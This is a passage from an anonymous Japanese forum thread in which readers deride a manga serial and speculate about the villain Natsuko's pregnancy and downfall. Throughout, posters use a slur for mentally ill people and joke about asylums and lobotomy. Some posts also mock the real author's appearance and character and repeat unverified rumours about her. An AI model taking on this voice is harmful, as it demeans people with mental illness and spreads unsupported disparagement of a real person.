こやまちぇんちぇいの右に出る者はなし。

148 :花と名無しさん:2006/12/27(水) 01:35:27 ID:???O
>>147
昭和の香りのするファッションとサーファーカットも追加させて!

149 :花と名無しさん:2006/12/27(水) 01:45:45 ID:???0
>>145
あれを見たときシーマンのパクリかと思いました。>人面魚

150 :123:2006/12/27(水) 01:53:13 ID:???0
>>129
乙です!そしてお気遣いありがとうございます。
内容、分かりやすかったですよ〜!
まんま昼メロですねププ・・・人面魚のキーホルダーがツボですたw

151 :花と名無しさん:2006/12/27(水) 02:12:11 ID:???0
安定しているというより膠着した印象>こやま絵
描き続けても進歩ゼロ。

152 :花と名無しさん:2006/12/27(水) 03:04:30 ID:z7may2ptO
画力は有るけどセンスが無い。

153 :花と名無しさん:2006/12/27(水) 09:29:17 ID:???0
安定している → コピー使い回しだからいつも同じ

154 :花と名無しさん:2006/12/27(水) 11:17:08 ID:UYPSk+Bk0
しかし・・・奈津子の妊娠にはえらい時間かけてるなー
休載してる時間はなんだったのかなーって思ってしまう・・・。
気を持たせて妊娠してなかった・・・とかありえそう。

155 :花と名無しさん:2006/12/27(水) 17:17:31 ID:???0
ヒカル、やっぱり移動しないね〜
普通ああいった状況ならさっさと移動願い出すよw
そこまであの部署に愛着があるという設定は無理がありすぎ。
振動との絡みが必要だから、無理やり据え置いているのがミエミエだね。

156 :花と名無しさん:2006/12/27(水) 17:58:34 ID:???0
>>155
「自分の開発した商品が好きだから移動したくない」という主張自体はアリだと思う。
でも、部長でさえ振動の上司によって移動させられてるのに、「残りたい」で残れるひかる
は変だなあとは思う。

157 :花と名無しさん:2006/12/27(水) 18:54:07 ID:???0
妊娠しててもお決まりの流産で一生奈津子と一緒にいるという
責任を負わされるんだろうな>震動

158 :花と名無しさん:2006/12/27(水) 19:05:25 ID:???0
責任とりまくり人生ですね>振動
でもまあ、振動の魅力よくわかんないし特に同情もしませんが

あー、奈津子の苦しむ顔が早く見たいよ〜

159 :花と名無しさん:2006/12/27(水) 21:06:37 ID:???0
>あー、奈津子の苦しむ顔が早く見たいよ〜

同意。

酷い略奪しても、医者に色仕掛けして仕事の邪魔しても
何故かどこからも非難を浴びていないどころか
評価は上がるばかり。逆に本来なら
被害者であるはずのひかるばかり、苦境に立たされている。
ひかる嫌いだけど、あまりにおかしな設定だもんな。




160 :花と名無しさん:2006/12/27(水) 22:27:54 ID:???0
>>159
最初から最後まで同意。
私もひかるがスキってわけじゃないんだけど、
あんな基地外奈津子がこのまま最後まで嫌な思いをせずに連載が終わったら、
ネタ漫画としてもいい加減許されないレベルだと思う。
最後に振動が奈津子の元に残るっていうのも本来なら全く
納得いかないよ(ってもうそうなるような気がしているわけだがw)
一人孤独に発狂してキエーッって叫ぶ奈津子が見れたらそれがベストエンドだけど。

でもこやまってどこまでもぬるいから、心配になってくる。
せめて読者サービスとしてのカタルシスをくれ!といいたい。
奈津子さえ不幸になってくれたらその他の展開はどうでも良い。
多くの読者がそうおもってるんじゃなかろうか?


161 :花と名無しさん:2006/12/27(水) 22:36:58 ID:???0
私は別に奈津子不幸になるの見たいとは思わないなあ

162 :花と名無しさん:2006/12/27(水) 23:45:38 ID:???0
))160

私もひかるが別に幸せにならなくてもあとはどーでもいいんだけど。
最後、奈津子さえ、不幸(バッドエンド)にしてくれたらそれでいい。
あれだけ、「こんな悪魔!見たことない」とか煽っておいて、今の所、
奈津子の思い通りに(都合のいいように)話が進んでいるのは
ちょっとねえ〜。勧善懲悪モノ好きの日本人の国民性からして面白味に欠ける。


163 :花と名無しさん:2006/12/27(水) 23:53:50 ID:???0
林檎のラストシーンは
基地外病院の鉄格子の中の奈津子のUPで決まり!!
(ついでに、あの母親とペアでもOK)

164 :花と名無しさん:2006/12/28(木) 00:02:35 ID:???0
このまま妊娠させるなら、「流産」のショックで発狂、な流れがベストだね。

ラストは基地外病院でお人形さんを抱いてうつろな眼をしている奈津子。

誰が面会に来ても反応しないがひかるにだけは反応する・・・。哀れ〜。


165 :花と名無しさん:2006/12/28(木) 00:05:58 ID:???0
ラスト、ロボトミー手術受けて目がうつろな奈津子とかでもおK。

間違っても
奈津子の思惑通り妊娠、それを期に振動奈津子への愛に目覚め、
ソファーの上とかで奈津子の腹に耳とかあてて、
振動「おっ!今蹴ったな!」奈津子「やだ〜雅也さんたら気が早い〜」
そういうシーンは見たくない。
でも、妙なところで読者の期待を裏切るのがこやまクオリティという
気がしないでもなく。…ハッ、これってこやまの思うツボ?


166 :花と名無しさん:2006/12/28(木) 00:13:40 ID:???0
現状でも充分、病院送りになってもいい程の基地外だけどw。なつこ。
リンゴ終わったら続編「嫌われ(な)つこの一生」でもやれや。こやま

167 :花と名無しさん:2006/12/28(木) 00:28:17 ID:???0
>>164
>>166
どっちもイイね〜

気が狂ってもなお、母親が、狂ったふりなんかしてないで、金ちょうだいよ!
とか催促してるとかね。


168 :花と名無しさん:2006/12/28(木) 04:23:12 ID:???0
こやまちぇんちぇー、前スレのこのレスみてヒント得た?w

651 名前: 花と名無しさん 2006/11/09(木) 14:35:18 ID:???0
>>649
セックスの後、カレンダーを見ながら何やら指折り数えて
下腹部に手を当てながらほくそえむ奈津子…
とかでも伝わるのにね。

169 :花と名無しさん:2006/12/28(木) 07:16:55 ID:???0
これだけ読者に期待させておいて
ただのストレスから来る生理不順だったらお笑いだよな。奈津子。
それこそキーッ!妊娠しないのはひかる(に精神的ストレスをかけられた)
のせいにされそう。

170 :花と名無しさん:2006/12/28(木) 07:32:57 ID:???0
うん!医者にも行きもしないでカレンダーの日付checkだけで喜ぶなんて
時期尚早杉。
自分も、稀に2〜3週間遅れることもあったし(1カ月の時も)
こんなことは女の人なら、結構ある事だと思うけど。生理不順w。

171 :花と名無しさん:2006/12/28(木) 17:58:47 ID:???0
排卵日を計算してるくせに基礎体温は計ってないのか?
ただ遅れただけじゃ生理不順だと思うよね。

172 :花と名無しさん:2006/12/29(金) 02:49:09 ID:???0
>168
その頃には原稿を出し終えているだろうよ

173 :花と名無しさん:2006/12/29(金) 07:42:34 ID:???0
待ちに待った妊娠なら
今時は、生理予定日のまえに検査薬試すしね。
30日以上たってからカレンダー数えるなんて、悠長な妊婦希望者

174 :花と名無しさん:2006/12/29(金) 10:12:48 ID:???0
やっぱり、精神おかしいよな。>基地外奈津子
妄想自己厨女w。
こいつなら医学的根拠もなく、生理不順でも妊娠したと思い込みそうだな。
そんでもって遅れてやって来たただの生理を流産と勘違いして
また、それをひかるのせいにして逆恨みしそう。

175 :花と名無しさん:2006/12/29(金) 10:19:59 ID:???0
>>173

いやーでもさすがこやまだよ。
いったいいつの時代の話?っって感じ。
今ならお手軽に薬局ですぐに妊娠判定できる代物があるって事
厨房でも知ってるのにね。

176 :花と名無しさん:2006/12/29(金) 13:37:53 ID:???0
昭和に青春だった人達が共感するんでそw

177 :花と名無しさん:2006/12/29(金) 23:38:46 ID:???0
こやまが描く奈津子のことだから、また会社に乗り込む等で
ヒカルの耳にダイレクトに入れる展開にするんだろうな。

奈津子「ちょっと気分が悪くて・・」
ヒカルの馬鹿後輩「えぇぇ!もしかしておめでたですかぁ?」
奈津子「えぇ、実はそうなの、3ヶ月で(心の中で高笑い)」
ヒカル縦線
『振動さんと奈津子の子・・・あの人の子供を奈津子が産むなんて!』

とかやるんでしょう、どうせ。

178 :花と名無しさん:2007/01/03(水) 14:13:26 ID:pUrZ5IwY0
ここのスレの皆様はお正月くらいは、クソ漫画の話なんてせず、心安らかにお過ごしなんでしょうか?

179 :花と名無しさん:2007/01/04(木) 21:50:54 ID:???0
今年こそこの糞・クソ漫画が終わることを祈る。
ただでさえ下らない話をろくなネタもないのにいつまで引っぱってるのさ?
下品な主人公も眉毛の濃い基地外女もバッド・エンドでいいよ。




180 :花と名無しさん:2007/01/06(土) 20:22:35 ID:???0
でもさあ、終わっても、「おまたせ!読者の皆様待望のリアルラブ新連載!!」
とかいってすぐ新しい連載始まりそうなんだよね

次回作、どんなダサいタイトルもってくるのかちょっと楽しみな
自分がいる…こやま読みきりとか描けるのなら読みきりキボン


181 :花と名無しさん:2007/01/07(日) 00:50:41 ID:???0
面白いとは思えないけどバレを待ってしまう…

182 :花と名無しさん:2007/01/08(月) 11:55:42 ID:???O
そろそろバレくる?お待ちしてます…。

183 :花と名無しさん:2007/01/08(月) 20:06:18 ID:???0
前回は不発だったから
今回はクソネタ爆弾投下期待。
ただそれだけのこやまんがなのだが、wktk。

184 :花と名無しさん:2007/01/08(月) 22:23:11 ID:???0
コンビニで売ってた
でも見れなかったorz

185 :花と名無しさん:2007/01/09(火) 02:17:50 ID:???0
このスレのネタバレってさ、ちゃんと規制守ってたっけ?
以前は発売日の前日とかにうpされてたような気がするんだけど…

186 :花と名無しさん:2007/01/09(火) 06:26:07 ID:KWbjy0q20
177に近いこと書いてあったど-----------★

でも・・・

「実は病院ではまだ小さすぎてわからないって
言われたんですけど・・・
自分では確実だと思います」
とか言ってんの。

あとで・・・間違いだった--------!!ってなんて伏線か?

187 :花と名無しさん:2007/01/09(火) 14:08:42 ID:???0
))186
どこまでバカなのこやま?って言いたい。
今のご時世、セクースして1、2週間で「確実」に妊娠してるかわかるんだぞ。
最新医学をなめてんのか?相変わらずの手抜きでいい加減な知識しかない女。
35とか、ひと月以上もカレンダー眺めた挙句、医者からまだわかんないって???
子供の影だと思ったら、子宮筋腫かガンの腫瘍だった・・。とかだったら面白いねえ〜。
ここまで奈津子が妊娠してるかどうかわかんないって引っ張り杉るのは、186
さんも書いてるような落ちがあるんだろうね。

188 :花と名無しさん:2007/01/09(火) 14:28:46 ID:???0
不倫のためならカルテの改ざん(犯罪行為)まで描く奴だものね。
こやまにかかっちゃあ最新医学も自分のご都合主義でいくわな。
ふつー誰が考えても本当に奈津子が妊娠してるのなら、今号くらいで
はっきり確定!なこと描くだろう。引っ張りすぎは不自然。


189 :花と名無しさん:2007/01/09(火) 16:40:12 ID:ZpNFnrCjO
扉絵から笑えた

190 :花と名無しさん:2007/01/09(火) 17:18:40 ID:???0
こやまって何を描きたいのか作品からは全然伝わってこない。
いいかげんさは伝わるけどね。

191 :花と名無しさん:2007/01/09(火) 19:02:29 ID:???0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
乙女@アロマリエ総合【月ノ光太陽ノ影】10 [女向ゲー大人]
【DVD】 伊藤塾在宅生出席簿 4【DVD】 [shihou]
また騙されてシャワートイレ板に飛ばされた訳だが 4 [シャワートイレ]   ←←←

おまえらwwwwwwwワロスwwwwww

192 :花と名無しさん:2007/01/09(火) 20:00:05 ID:???0
ガイシュツの可能性大だけど
http://www.kisscomic.com/interview/0308_koyama_yukari/index.html
これ読んで激しく脱力した・・・
つっこみどころ満載すぎ

193 :花と名無しさん:2007/01/09(火) 21:27:51 ID:jl97sY580
あ〜早くみたい!

194 :花と名無しさん:2007/01/09(火) 21:58:38 ID:???0
>>187
いや、分からないこともあるみたいよ。
ttp://okwave.jp/qa2648703.html

私が↑にレスしている人間の一人のヲチスレの住人で、>186を読んで
スレ間違えた?と思ったもので。

195 :花と名無しさん:2007/01/10(水) 00:37:23 ID:???0
>>187
私も検査薬では間違いないってでたけど(わりと周期正確で
1週遅れぐらいで病院へ行った)まさに「小さすぎてわからない」
といわれたよ。もちろんまず間違いないんだろうけど、
映るには後1週ぐらい必要だったかなあ。それに
子宮外とかでない、とわかるのにさらにもうすこしいったような。

196 :花と名無しさん:2007/01/10(水) 00:57:53 ID:???O
基本的に心臓がみえないと妊娠つげてくれないよね
今の病院て
ただ検査役の反応だけならエチーの一週間後から陽性か陰性かでるって
うちの病院のテンテーは言ってたな

197 :花と名無しさん:2007/01/10(水) 01:28:32 ID:???0
なんか今回奈津子の人間性がバレそうなフラグが立ってなかった?

198 :花と名無しさん:2007/01/10(水) 07:14:40 ID:8klQa+26O
バレてたというか、突っ込まれてたね。

199 :花と名無しさん:2007/01/10(水) 13:07:06 ID:???O
>>189
あの扉絵はたしかに破壊力バツグンだった(゜Д゜)

一見の価値はある
だがその後の保障はしない

200 :花と名無しさん:2007/01/10(水) 13:15:51 ID:???O
あと、扉絵のアオリに
【女性誌グラマラスで奈津子みたいな女になりたい!の声】って
書いてあったけど、もうネタとしてだよね?

201 :花と名無しさん:2007/01/10(水) 13:27:08 ID:???0
>>200
韓流ドラマよりはまると評判です、
っていうのも、ネタだよね?

202 :花と名無しさん:2007/01/10(水) 13:27:59 ID:???O
↑グラマラス…のあおりは大爆笑!絶対編集部はネタにしてるよこやまんがを(笑)
しかし「回数」が『Apple34』になってる事に初めて気付いた(のだめはLesson○○なんだよね)
さすがこやまセンス。
1/2個どころか34個までになっちゃったね♪
何個位までダラダラいくのでしょうか…

203 :花と名無しさん:2007/01/10(水) 16:10:28 ID:???0
しっかし、振動!
全然身に覚えがないからか、奈津子の妊娠を驚きはしても、
ちっとも喜んでる様子じゃないねえ。お気の毒に。

204 :花と名無しさん:2007/01/10(水) 16:15:23 ID:rYrH+s/X0
奈津子は本当に幸せっていうのが、どんなものか判ってないんだね。
人数さえ揃えば幸せな家庭が作れると思ってるのか?
あの状態で子供が生まれても、奈津子は一生幸せを味わえないと思う。
不憫になってきたよ。

205 :花と名無しさん:2007/01/10(水) 16:32:53 ID:???0
>>204
そんなに本気で心配しなくていいよw
入れ込むには安すぎる、こやまんが。
どーせまた次号で「奈津子ちょーむかつく」ってな展開になるから。

206 :花と名無しさん:2007/01/10(水) 16:46:13 ID:rYrH+s/X0
いや、入れ込んでるんじゃなくて、とことん哀れんでる
だけよ。奈津子にもこやまにも。

207 :花と名無しさん:2007/01/10(水) 17:48:37 ID:???0
こやま思ってたよりはふつーのルックスだね>192

コヤマンがが異常すぎて、もっと異常なルックス?の
人を想像してたヨ。ま、外見からは人の中身tって
わからんのね・・・。

208 :花と名無しさん:2007/01/10(水) 21:25:14 ID:???0
やっぱりお約束のヒカルやみんなの前の暴露でしたね。
100%当てられるなんて作家として恥ずかしくないのか?

209 :花と名無しさん:2007/01/10(水) 21:51:27 ID:???0
>>206
奈津子、可哀相〜とか言ってもらえると、
こやませんせにとって最大のほめ言葉になるのよ。

210 :花と名無しさん :2007/01/10(水) 21:55:59 ID:V+zyu9Ba0
ってことわ
妊娠があとで・・間違いだった--------!!って伏線も当たるかもw

211 :花と名無しさん:2007/01/10(水) 22:05:43 ID:???0
複線つうか、予想じゃない?

しかしナツコもいい奥さんぶりたいんなら「点数稼ぎ〜」なんて言わなきゃいいのに

212 :花と名無しさん:2007/01/10(水) 22:06:48 ID:???0
しかし、このまま奈津子の思い通りに事が進むとは思えない。
Kissスレにも書いてる人が、こやまんの悪役には必ず不幸のフラグがたっている
って、さ。なんか、そんなフラグたってたのかな?まだ読んでないからわかんないけど。
やっぱ、この奈津子妊娠?のエピもただ話引き伸ばしたいだけのことなんじゃあないかと思うけどね。
あと3回で(7巻分だし)もう林檎も終わるんじゃないの。

213 :花と名無しさん:2007/01/10(水) 22:15:01 ID:???0
こやまが思いつきそうな展開をたどると奈津子流産に行き着く

214 :花と名無しさん:2007/01/10(水) 22:25:16 ID:???0
次号、生理遅れてやってきましたあ。「間違いでした〜」チャン!チャン!
だと笑う。かえって皆の前で暴露したのが仇になって
収集がつかなくなり、顔に縦線入りまくりの奈津子キボンヌ。

215 :花と名無しさん:2007/01/10(水) 22:39:22 ID:???0
DQN母久々の登場とかで、思うように金を入れてくれない奈津子に不満爆発。
あのデブ図体の母の体当たりで、流産とか。

216 :花と名無しさん:2007/01/10(水) 22:48:29 ID:???0
それにしても、今更「奈津子の登場、目が離せません!!」とか「『奈津子になろう』と
大人気!!」とか「リンゴの隠れ人気キャラ奈津子」とかって扉絵で煽ってもね〜。
ちょっと前は、「こんなひどい女みたことない」みたいなこと書いてたのに。
別に主人公の女は好きじゃないけど、あんな奈津子みたいな女にはこれっぽちも
同意も同情もできんわ。
やっぱ、最後でもどこでもいいから、一度は奈津子を叩いてもらわないと気分ワル杉!

217 :花と名無しさん:2007/01/10(水) 23:14:15 ID:???0
間違い・流産どちらにしても
ナツコが出産するところまで行きつかないのは皆、確信している。
こやまが主人公じゃないキャラ(むしろ主人公の仇役)を、
ここまでマンセー扱いするのは珍しいと思われ...。

218 :花と名無しさん:2007/01/10(水) 23:20:25 ID:???0
奈津子と天野、親が飲んだくれ同士の二人がくっつくのが
気が合ってちょうどいいのではないかと思いますた。

219 :花と名無しさん:2007/01/10(水) 23:25:58 ID:???O
奈津子の母親と天野のとーちゃんのが気が合いそうw

220 :花と名無しさん:2007/01/10(水) 23:44:23 ID:???0
とにかく、もし本当に妊娠だったら腹に手を当て、妊娠確信!と奈津子にやらせるより
産婦人科でおめでたですよ、または検査薬で科学的に懐妊ということを読者に知らせると思う。
というかこやまだったらやるよね。

ゆえに、奈津子の思い過ごし率99%

妊娠してなかった奈津子が振動の気持ちをつなぎとめて置くために
腹に座布団巻いたりしたらちょっとおかしいw


221 :花と名無しさん:2007/01/10(水) 23:58:54 ID:???O
>>220の予想どおり腹に座布団入れたら
臨月に赤子誘拐→タケウチの有力者の孫→誘拐バレ
→振動失脚→離婚→ひかる『振動さんを支えるのはあたししか居ない』
っていう、昭和昼ドラ展開か?!

222 :花と名無しさん:2007/01/10(水) 23:59:25 ID:???0
>>217
流産だと、奈津子はそれも「絆作り」に利用しそうだよね。
間違いの方は、奈津子は妊娠検査薬も使って「陽性」は確認していると
思うから、どうだろう。

223 :花と名無しさん:2007/01/11(木) 00:10:23 ID:???0
でも妊娠検査薬は100パーじゃないし

224 :花と名無しさん:2007/01/11(木) 00:13:44 ID:???0
奈津子の人生はヒカルへの逆恨みに支配されているから
流産→ヒカルのせいで!!
殺傷事件まで行くかはわからんが更に凄いことしそうだな。



225 :花と名無しさん:2007/01/11(木) 00:29:51 ID:???0
>>220
禿同
この時点で未だ素人判断の域を超えてない所、やっぱ、変。
ふつうなら今号位で、産婦人科で「おめでとうございます」と
単純にお墨付きをもらうだろう。
奈津子のあの「実は・・」のセリフ、こやまんがにしてみたら
手の込んだセリフ回しだとおも。



226 :花と名無しさん:2007/01/11(木) 00:43:07 ID:???0
緑茶発情、覚えてないのか振動?
そんなら、次号ぐらいで
振動「本当のこと言えよ。誰の子なんだ?」
そのセリフで奈津子、ショックで流産。とかw。
そんでまた、流産の責任と二重の十字架を背負わされる振動。

227 :花と名無しさん:2007/01/11(木) 00:55:09 ID:???0
読者プレゼントに緑茶が出ていたのを誰も触れない件について

228 :花と名無しさん:2007/01/11(木) 00:57:45 ID:???0
>>221
ほんと、基地外奈津子ならいざとなったら、新生児誘拐でもやりそうだ。


229 :花と名無しさん:2007/01/11(木) 01:09:17 ID:Y0MQceDWO
偽装妊娠を企む奈津子の必死さに振動の心が揺れ動いて、奈津子をいじらしく思いだす。振動にやっと愛されるようになって初めてひかるに対して罪悪感が芽生え、ひかるに土下座して謝罪する奈津子。
奈津子のほっぺたを叩き、これでおあいこねと豪快に笑うひかる。
その後、天野にあなたを支えたい宣言をして結婚でもしてくれたなら、本屋で漫画買ってもいい。


230 :花と名無しさん:2007/01/11(木) 01:14:31 ID:???0
しかしもし私がヒカルならいくら奈津子自ら電話がかかってきたとはいえ、
傷つくのがわかりきっててるのに絶対振動邸なんかいかない。

だいたい、元社員とはいえ奥さんが考え付いたパーティにヒカルとのひと悶着も知ってる会社の人呼べるよな〜
こやまの会社員時代ではよくあったことなんだろうか?



231 :花と名無しさん:2007/01/11(木) 01:22:50 ID:???0
>>229
しーっ!こやまにネタ与えちゃだめだよ!
つーかちょっと指輪の約束みたいな展開に
なりそうな気がするんだけど私だけ?

232 :花と名無しさん:2007/01/11(木) 01:26:08 ID:???O
流産か妊娠してなかったかどっちでもいいけど、それを知ってホッとした顔を見せてしまう振動、
それを見てますますひかる憎しの炎が燃え上がる奈津子、あたりでいいや

しかしひかるの味方の後輩の髪型はあまりにあか抜けてないな

233 :花と名無しさん:2007/01/11(木) 01:54:40 ID:???O
>>227
本当だw
応募する人いるのかな?
ところでグラマラスで奈津子祭りってことは
どんな汚い手を使っても男騙すテク満載なのか?
立ち読みしてみるわ

234 :花と名無しさん:2007/01/11(木) 02:28:23 ID:???0
私がこやまなら、
過去の伏線使って、奈津子の派手な男遍歴が祟り、(なんか
人工中絶の1つや2つしてそうな感じだったし)
性感染症(クラミジアでいいか)に罹っていて不妊症だった。
ってするいけどw。

235 :花と名無しさん:2007/01/11(木) 02:32:29 ID:???0
グラマラスって工藤静香も連載してた雑誌なんだよね・・・
そういう系統の雑誌なんだ。

236 :花と名無しさん:2007/01/11(木) 02:40:29 ID:???O
>>235
そうか!だまし討ち推奨雑誌か

237 :花と名無しさん:2007/01/11(木) 02:44:45 ID:???0
りんごは時間経過が遅いからあり得ないかもしれないけど、

無事に子供が産まれるが、夜泣きがひどいとかそんな感じの育てにくい
赤ちゃんで、初めて計算通りに行かない&逃げ出すことのできない相手と
24時間一緒。
良い妻を演じきりたい奈津子は、夜泣きで振動が眠れないことを心配し
別室で赤ちゃんと二人で寝る。
振動は仕事が忙しくなり深夜帰宅早朝出社のすれ違い生活。
ある日ついカッとなって赤ちゃんを殴ってしまう。
自分の母親と同じ母親失格の自分にあぜんとし、その場は反省するが
暴力は止められない。
そして振動が赤ちゃんの痣に気が付いてしまう・・・とかなんとか。

流産も妊娠間違いも、奈津子の手にかかれば、振動とのコミニュケーションの
ネタにされてしまいそうなので、自爆してもらわないと。

238 :花と名無しさん:2007/01/11(木) 02:47:30 ID:???0
工藤と奈津子

なんか類似点があるような希ガス・・。

239 :花と名無しさん:2007/01/11(木) 02:57:37 ID:???0
奈津子の自爆(不幸)フラグは、皮肉にも
この妊娠騒動で立ったと思うよ。


240 :花と名無しさん:2007/01/11(木) 03:31:13 ID:???O
奈津子は実は想像妊娠に1000アポー

241 :花と名無しさん:2007/01/11(木) 09:29:14 ID:???0
最初の頃忘れたんだけど、奈津子はなぜにヒカルに敵意むきだしなの?
はっきりとした理由があった??


242 :花と名無しさん:2007/01/11(木) 09:37:44 ID:???0
確か「何の苦労も知らないくせに私はどんな事が
あってもめげません」みたいな所が気に入らないって言ってなかった?
本当にどんな事があってもめげないのか見てみたかったって。


243 :花と名無しさん:2007/01/11(木) 09:44:14 ID:???0
>>230
「なにかわたしに顔向けできない理由でもあるんですか」って
そんなことナツコに言われる筋合いはないんだけど、それにムキになって
反応して、結局行くハメになってしまうひかるもねぇ。
振動は当然ひかるは来ないと思っていたみたいだったのに。


244 :花と名無しさん :2007/01/11(木) 12:59:35 ID:???0
奈津子が生い立ちが不幸で、「あったかい家庭が欲しかった」と
語ってるけどアダルトチルドレンかもね。または境界性人格障害。
つまりはメンヘラー。異常行動も納得。

だけど、何故か同情は感じない^w^

成人してるのだから、親の呪縛から解き放たれて欲しい。自分は自分と。
もっとも、DQN母が金をせびりにくるからそれも難しいか

245 :花と名無しさん:2007/01/11(木) 17:17:25 ID:???0
で、ひかるはこれから天野に少しは傾くんだろうか。

246 :花と名無しさん:2007/01/11(木) 17:57:14 ID:???0
>>243

ホントに、低レベルだね。2人共。なんかどっちもどっちって感じ。アホクサ!
喧嘩は1人ではできないんだから、相手にしないで無視するけどね。
賢い女ならw。所詮、こやまが描くキャラってこの程度の度量しか
ないのはいつものことだけどね。


247 :花と名無しさん:2007/01/11(木) 18:06:29 ID:???0
この人の漫画のキャラって、皆、何かがおかしい。
????の連続で、誰1人として、ハッピー・エンドで終わればいいのに..
なんて思うキャラがいないよ。


248 :花と名無しさん:2007/01/11(木) 18:42:35 ID:???O
この人の作品って毎回ムダに長く連載するよね…
コミクス、売れてんの!?

249 :花と名無しさん:2007/01/11(木) 21:35:15 ID:???0
食べたくもない奈津子の手料理→一口たべてウマーで大騒ぎ…
ひかるって何でいつも食べ物にガツガツしてんの?


250 :花と名無しさん:2007/01/11(木) 21:40:53 ID:???0
ほんと無駄に長いね。
馬場先生とか総務でどーでもいい絞り染め布を作ってたなんて遠い過去のようだ。
しかも、今後のストーリーに何も生かされなかったし。

251 :花と名無しさん:2007/01/11(木) 21:41:37 ID:???0
>>249
そのシーン、なんか不自然だと思った
いくらうまくても、
不倶戴天の敵、奈津子の料理に
ああいうリアクションは出ないだろ、普通……
今回ばかりは奈津子のその後のセリフの方がまともに思えた
ま、しょせん、こやまんがだからいいんだけどさ

252 :花と名無しさん:2007/01/11(木) 22:08:10 ID:???0
>>249
元祖サンドイッチガツガツ女〜。
これも、遠〜い昔のどーでもいい無駄なエピの1コマだったね。

酒はグビグビやるわ、部屋はのだめ級の汚さ、下品な言葉は平気で吐くし
こんな女がヒロインの王道!こやまんが。




253 :花と名無しさん:2007/01/11(木) 22:22:27 ID:???0
バレも来ないし
もう「ネタ漫画」としても飽きられてきてるのかな?末期症状だね。


254 :花と名無しさん:2007/01/11(木) 22:55:03 ID:???0
こやまんがは敵キャラも悪役キャラも本当の不幸にはならないので
奈津子人格破壊も事件も起こらない思う。もちろん身の破滅もなし
軽い気持ちで犯罪しても犯罪にならないし(カルテ改ざんとか)
多分そういう激しいエピをきちんと描けないか思いつかないか。

奈津子の弱さを知って振動がほだされる→
ひかるを夫婦でマンセーしつつ左遷先で夫婦としてやりなおす

ひかると天野は二人でタケウチの出世頭になり
振動&奈津子も左遷先の遠い空の下でうまくいってるらしく
「色々あったけど、これでよかったんだ 私の半分の林檎はこの人だった」と
天野とハピーエンド

散々既出だけどこれがラストと思う。
あ、でも子供が出来ても簡単に離婚しちゃったりするからなー
奈津子が身を引くけどひかるは天野を選ぶ、はあるかも
結局は全員がひかるマンセーってのはガチ

255 :花と名無しさん:2007/01/11(木) 23:27:48 ID:???0
ある意味神展開想像。

すったもんだあり、振動と奈津子が離婚。
振動とヒカルがくっつくと思いきや
「やっぱり私たちは一緒にいちゃダメだったんだよ、私たちは同じ林檎じゃなかった・・(>>254引用)」
とかで振動が失脚した振動は地方営業所で一から出直し。

酒に溺れやさぐれた奈津子を天野がなぜか気にかけたりする。
ヒカルは「きっと片方の林檎を見つける!私はもっと強くなる!」とかいいながら○飛ばして歩む。。。


256 :花と名無しさん:2007/01/11(木) 23:31:34 ID:???0
>>酒に溺れやさぐれた奈津子を天野がなぜか気にかけたりする

酒飲みのだらしない親に苦労してる仲間だしね

257 :花と名無しさん:2007/01/12(金) 00:04:31 ID:cWDf200v0
>>243
考えてみれば、「顔向けできない理由」があるのは奈津子の方だよな。
強引な略奪、外堀だけ埋めて、振動本人は納得しないまま
やけくそというか、引きずられて結婚したんだから。

258 :花と名無しさん:2007/01/12(金) 00:18:56 ID:???0
奈津子は基地外なんだし、マジでこやま自身も奈津子がどんな女だったかを
すっかり忘れてるんじゃないの。

そんなこやまが上スレの面々のような話の展開に持って行くだけの技量が
あるとは思えない。クソ漫画は最後までクソ漫画らしく、
訳のわからん内に終わるんじゃね?

259 :花と名無しさん:2007/01/12(金) 00:37:11 ID:???0
>>255
>酒に溺れやさぐれた奈津子を天野がなぜか気にかけたりする

それ、いいですね。天野もどうしても好きになれないキャラなんで奈津子と
くっついて貰いたい。お似合いだよ。

260 :花と名無しさん:2007/01/12(金) 01:28:25 ID:???O
かあた

261 :花と名無しさん:2007/01/12(金) 04:08:01 ID:???0
>251
こういう空気読まない無神経女がこやまにとっては「おおらかで
素直ないい女」なんだよね。

262 :花と名無しさん:2007/01/12(金) 12:02:25 ID:???O
>261
山口智子風味の芝居がはまるかも
イメージロンバケ南のキャラ設定?


263 :花と名無しさん:2007/01/12(金) 14:16:46 ID:???0
>>259
本当、それいいすね。

254>奈津子の弱さを知って(振動→を天野に変換)で
振動に捨てられた(離婚された)奈津子に同情。
こうなれば第1回のネタバレ大ドンデン返しになるし、
ずっと読者をうまく釣っていたということで
こんな展開になったら少しはこやまを見直してやるが・・・。


264 :花と名無しさん:2007/01/12(金) 14:23:55 ID:???0
>>261

そんな、常人ではないこやま自身、友達とかあまりいなさそうだ。

過去スレでも、高校時代のこやまの事書いてあるのを見たけど
あんまし目立たない暗い感じのする女だったらしい。

265 :花と名無しさん :2007/01/12(金) 15:17:24 ID:???0
天野×奈津子イイね〜

天野みたいなタイプの方が、奈津子を受け止められそうな気が。

振動は、まだ子供作らなくていいじゃんって言ってたし
今も「ひかるぅ〜ひかるぅ〜」といいながらエチーするくらいだし
奈津子が「幸せにしてね」→「…あぁ」と含みがある感じ。
ひかるの事をまだ好きなのは明らか。
なので神展開キボンヌな妄想。。

266 :花と名無しさん:2007/01/13(土) 01:12:10 ID:???0
連載開始の表紙が無ければそういう夢も追えるがw
誰と誰がくっつくか了解の上で楽しめるのってTVドラマだからこそ
なのにこやまって脳がTV漬けで勘違いしてるとしか思えない

267 :花と名無しさん:2007/01/13(土) 04:21:43 ID:???O
Kissの連載ってドラマ化が多いが、こや漫画はドラマ化しないねw

268 :花と名無しさん:2007/01/13(土) 04:45:54 ID:???0
万一またどっかからパクってきた漫画だったら怖くて使えないよ〜w

269 :花と名無しさん:2007/01/13(土) 15:33:13 ID:???0
盗作の前科がなくても、こんな糞ストーリーじゃ、ダメポ。

>266
氏もご指摘のように、脳内TVドラマ漬け(特に80年代の)のこやま、
無意識のうちにドラマネタパクって描いているのは間違いなし。
ほんとこいつの漫画読むと、過去のいろんなドラマのシーンが浮かぶんだわな。
こんな新鮮さのないのは、TV局も気にも留めないだろう。

270 :花と名無しさん:2007/01/13(土) 18:14:33 ID:???O
ひかるっていつもあのバッグだね

271 :花と名無しさん:2007/01/13(土) 19:04:37 ID:???0
チンケなすぐに切れそうなショルダー・バッグ?

それにこやまって、カラーの扉絵とか表紙にピース・サインのポーズと、
顔面いっぱいに逆三角(▽)の口大開けポーズ、描くの好きだよな。
両方ともバカに見える。

272 :花と名無しさん:2007/01/13(土) 19:06:07 ID:???O
デートも出勤も営業も、いつもあの変な模様の肩掛けバッグ…

